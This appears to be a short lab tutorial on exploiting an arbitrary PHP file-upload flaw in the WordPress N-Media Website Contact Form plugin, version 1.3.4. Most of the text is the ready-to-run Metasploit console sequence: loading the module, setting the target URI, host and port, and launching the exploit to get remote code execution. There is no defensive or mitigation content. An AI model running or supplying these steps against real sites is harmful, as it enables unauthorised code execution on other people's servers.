Exploit WordPress Using N-Media Website Contact Form with File Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets

WordPress N-Media Website Contact Form plugin

Requirement

Attacker: kali Linux

Victim PC: WordPress Installed

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit (wp_nmediawebsite_file_upload)>set targeturi //192.168.0.110/wordpress

msf exploit (wp_nmediawebsite_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_nmediawebsite_file_upload)>set rport 80

msf exploit (wp_nmediawebsite_file_upload)>exploit   

Leave a Reply

Your email address will not be published. Required fields are marked *